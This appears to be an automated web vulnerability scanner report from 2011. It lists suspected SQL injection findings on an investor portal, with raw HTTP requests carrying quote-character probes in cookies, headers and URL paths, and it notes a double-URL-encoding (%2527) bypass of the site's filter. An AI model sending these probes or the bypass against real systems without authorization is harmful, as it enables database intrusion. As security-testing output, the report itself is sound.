GET /investor/market/treasuries.aspx HTTP/1.1 Host: redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true%00'; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;
Response 1
HTTP/1.1 200 OK Connection: close Date: Sun, 30 Jan 2011 18:04:33 GMT Server: Microsoft-IIS/6.0 P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" X-UA-Compatible: IE=7 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 23413
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US"><head><meta http-e ...[SNIP]... <script type="text/javascript"> if(typeof(top.LogErr)!="undefined")window.onerror=top.LogErr; </script> ...[SNIP]...
Request 2
GET /investor/market/treasuries.aspx HTTP/1.1 Host: redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true%00''; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;
Response 2
HTTP/1.1 503 Service Unavailable Content-Type: text/html Date: Sun, 30 Jan 2011 18:04:33 GMT Connection: close Content-Length: 28
The CC cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the CC cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /investor/market/usindex.aspx HTTP/1.1 Host: redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US'; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;
Response 1
HTTP/1.1 503 Service Unavailable Content-Type: text/html Date: Sun, 30 Jan 2011 18:04:32 GMT Connection: close Content-Length: 28
<h1>Service Unavailable</h1>
Request 2
GET /investor/market/usindex.aspx HTTP/1.1 Host: redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US''; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;
Response 2
HTTP/1.1 200 OK Connection: close Date: Sun, 30 Jan 2011 18:04:32 GMT Server: Microsoft-IIS/6.0 P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" X-UA-Compatible: IE=7 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 35449
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US"><head><meta http-e ...[SNIP]...
The MC1 cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the MC1 cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the MC1 cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /investor/market/usindex.aspx HTTP/1.1 Host: redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32%2527; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;
Response 1
HTTP/1.1 503 Service Unavailable Content-Type: text/html Date: Sun, 30 Jan 2011 18:04:09 GMT Connection: close Content-Length: 28
<h1>Service Unavailable</h1>
Request 2
GET /investor/market/usindex.aspx HTTP/1.1 Host: redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32%2527%2527; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;
Response 2
HTTP/1.1 200 OK Connection: close Date: Sun, 30 Jan 2011 18:04:11 GMT Server: Microsoft-IIS/6.0 P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" X-UA-Compatible: IE=7 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 35449
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US"><head><meta http-e ...[SNIP]...
The CULTURE cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the CULTURE cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the CULTURE cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /investor/market/worldmarkets.aspx HTTP/1.1 Host: redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CULTURE=EN-US%2527; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;
Response 1
HTTP/1.1 503 Service Unavailable Content-Type: text/html Date: Sun, 30 Jan 2011 18:04:26 GMT Connection: close Content-Length: 28
<h1>Service Unavailable</h1>
Request 2
GET /investor/market/worldmarkets.aspx HTTP/1.1 Host: redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CULTURE=EN-US%2527%2527; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;
Response 2
HTTP/1.1 200 OK Connection: close Date: Sun, 30 Jan 2011 18:04:28 GMT Server: Microsoft-IIS/6.0 P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" X-UA-Compatible: IE=7 X-Powered-By: ASP.NET Server: TK2MCWBA01 X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 31518
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US"><head><meta http-e ...[SNIP]...
The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /investor/market/worldmarkets.aspx HTTP/1.1 Host: redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Referer: http://www.google.com/search?hl=en&q='
Response 1 (redirected)
HTTP/1.1 200 OK Content-Length: 3080 Content-Type: text/html Last-Modified: Wed, 04 Jun 2008 17:06:59 GMT Accept-Ranges: bytes ETag: "40a29a6665c6c81:1a400" Server: Microsoft-IIS/6.0 P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" X-UA-Compatible: IE=7 X-Powered-By: ASP.NET Server: TK2MCWBA01 Date: Sun, 30 Jan 2011 18:05:30 GMT Connection: close
The expid cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the expid cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /investor/market/worldmarkets.aspx HTTP/1.1 Host: redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2';
Response 1
HTTP/1.1 503 Service Unavailable Content-Type: text/html Date: Sun, 30 Jan 2011 02:16:18 GMT Connection: close Content-Length: 28
<h1>Service Unavailable</h1>
Request 2
GET /investor/market/worldmarkets.aspx HTTP/1.1 Host: redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2'';
Response 2
HTTP/1.1 200 OK Connection: close Date: Sun, 30 Jan 2011 02:16:18 GMT Server: Microsoft-IIS/6.0 P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" X-UA-Compatible: IE=7 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 31582
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US"><head><meta http-e ...[SNIP]...
The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /investor/partsub/funds/etfperformancetracker.aspx HTTP/1.1 Host: redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)' Connection: close Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;
Response 1 (redirected)
HTTP/1.1 200 OK Content-Length: 3080 Content-Type: text/html Last-Modified: Wed, 04 Jun 2008 17:06:59 GMT Accept-Ranges: bytes ETag: "40a29a6665c6c81:153c9" Server: Microsoft-IIS/6.0 P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" X-UA-Compatible: IE=7 X-Powered-By: ASP.NET Date: Sun, 30 Jan 2011 02:16:20 GMT Connection: close
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /investor/partsub/funds/etfperformancetracker.aspx?fam=&cat=&p=0&tab=mkt&s=ytd&o=d&1%2527=1 HTTP/1.1 Host: redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;
Response 1 (redirected)
HTTP/1.1 200 OK Content-Length: 3080 Content-Type: text/html Last-Modified: Wed, 04 Jun 2008 17:06:59 GMT Accept-Ranges: bytes ETag: "40a29a6665c6c81:1a400" Server: Microsoft-IIS/6.0 P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" X-UA-Compatible: IE=7 X-Powered-By: ASP.NET Server: TK2MCWBA01 Date: Sun, 30 Jan 2011 18:06:22 GMT Connection: close
The s parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the s parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /investor/partsub/funds/etfperformancetracker.aspx?fam=&cat=&s='&o=&p=0&tab=mkt HTTP/1.1 Host: redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;
Response 1 (redirected)
HTTP/1.1 200 OK Content-Length: 3080 Content-Type: text/html Last-Modified: Wed, 04 Jun 2008 17:06:59 GMT Accept-Ranges: bytes ETag: "40a29a6665c6c81:161bf" Server: Microsoft-IIS/6.0 P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" X-UA-Compatible: IE=7 X-Powered-By: ASP.NET Date: Sun, 30 Jan 2011 02:13:58 GMT Connection: close
The s_cc cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the s_cc cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /investor/partsub/funds/etfperformancetracker.aspx?fam=&cat=&p=0&tab=mkt&s=ytd&o=d HTTP/1.1 Host: redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true'; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;
Response 1 (redirected)
HTTP/1.1 200 OK Content-Length: 3080 Content-Type: text/html Last-Modified: Wed, 04 Jun 2008 17:06:59 GMT Accept-Ranges: bytes ETag: "40a29a6665c6c81:1a400" Server: Microsoft-IIS/6.0 P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" X-UA-Compatible: IE=7 X-Powered-By: ASP.NET Server: TK2MCWBA01 Date: Sun, 30 Jan 2011 18:05:29 GMT Connection: close
The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /investor/portfolio-manager%2527/portfolio.aspx HTTP/1.1 Host: redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;
Response 1
HTTP/1.1 503 Service Unavailable Content-Type: text/html Date: Sun, 30 Jan 2011 18:04:58 GMT Connection: close Content-Length: 28
<h1>Service Unavailable</h1>
Request 2
GET /investor/portfolio-manager%2527%2527/portfolio.aspx HTTP/1.1 Host: redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;
Response 2
HTTP/1.1 400 Bad Request Connection: close Date: Sun, 30 Jan 2011 18:04:59 GMT Server: Microsoft-IIS/6.0 P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" X-UA-Compatible: IE=7 X-Powered-By: ASP.NET Content-Type: text/html; charset=utf-8
The userCh cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the userCh cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the userCh cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /investor/portfolio-manager/portfolio.aspx HTTP/1.1 Host: redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0%2527; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;
Response 1 (redirected)
HTTP/1.1 503 Service Unavailable Content-Type: text/html Date: Sun, 30 Jan 2011 18:04:00 GMT Connection: close Content-Length: 28
<h1>Service Unavailable</h1>
Request 2
GET /investor/portfolio-manager/portfolio.aspx HTTP/1.1 Host: redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0%2527%2527; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;
Response 2 (redirected)
HTTP/1.1 302 Object moved Connection: close Date: Sun, 30 Jan 2011 18:04:02 GMT Server: Microsoft-IIS/6.0 P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" X-UA-Compatible: IE=7 X-Powered-By: ASP.NET cache-control: private Pragma: no-cache pragma: no-cache Location: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296410642&rver=5.5.4177.0&wp=MBI&wreply=http:%2F%2Fredacted%2Fpploggedin.aspx%3FPage%3Dhttp%253A%252F%252Fmoneycentral%252Emsn%252Ecom%252Finvestor%252Fportfolio%252Dmanager%252Fportfolio%252Easpx%26Query%3D&lc=1033&id=229 Content-Length: 443 Content-Type: text/html Expires: Sun, 30 Jan 2011 18:04:02 GMT Set-Cookie: lcid%5Fcb=%2D; expires=Mon, 01-Nov-2010 07:00:00 GMT; domain=.redacted; path=/ Set-Cookie: pp%5Fpage=http%3A%2F%2Fmoneycentral%2Emsn%2Ecom%2Finvestor%2Fportfolio%2Dmanager%2Fportfolio%2Easpx; path=/ Set-Cookie: pp%5Frefer=; path=/ Set-Cookie: pp%5Fquery=; path=/ Cache-control: private
<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296410642&rver=5.5.4177.0& ...[SNIP]...
The MUID cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the MUID cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /money.search HTTP/1.1 Host: redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F'; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;
Response 1
HTTP/1.1 503 Service Unavailable Content-Type: text/html Date: Sun, 30 Jan 2011 18:06:02 GMT Connection: close Content-Length: 28
<h1>Service Unavailable</h1>
Request 2
GET /money.search HTTP/1.1 Host: redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F''; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;
Response 2
HTTP/1.1 302 Redirect Connection: close Date: Sun, 30 Jan 2011 18:06:02 GMT Server: Microsoft-IIS/6.0 Location: http://moneycentral.msn.com/common/toobusy.htm
The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the User-Agent HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /money.search HTTP/1.1 Host: redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%2527 Connection: close Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;
Response 1
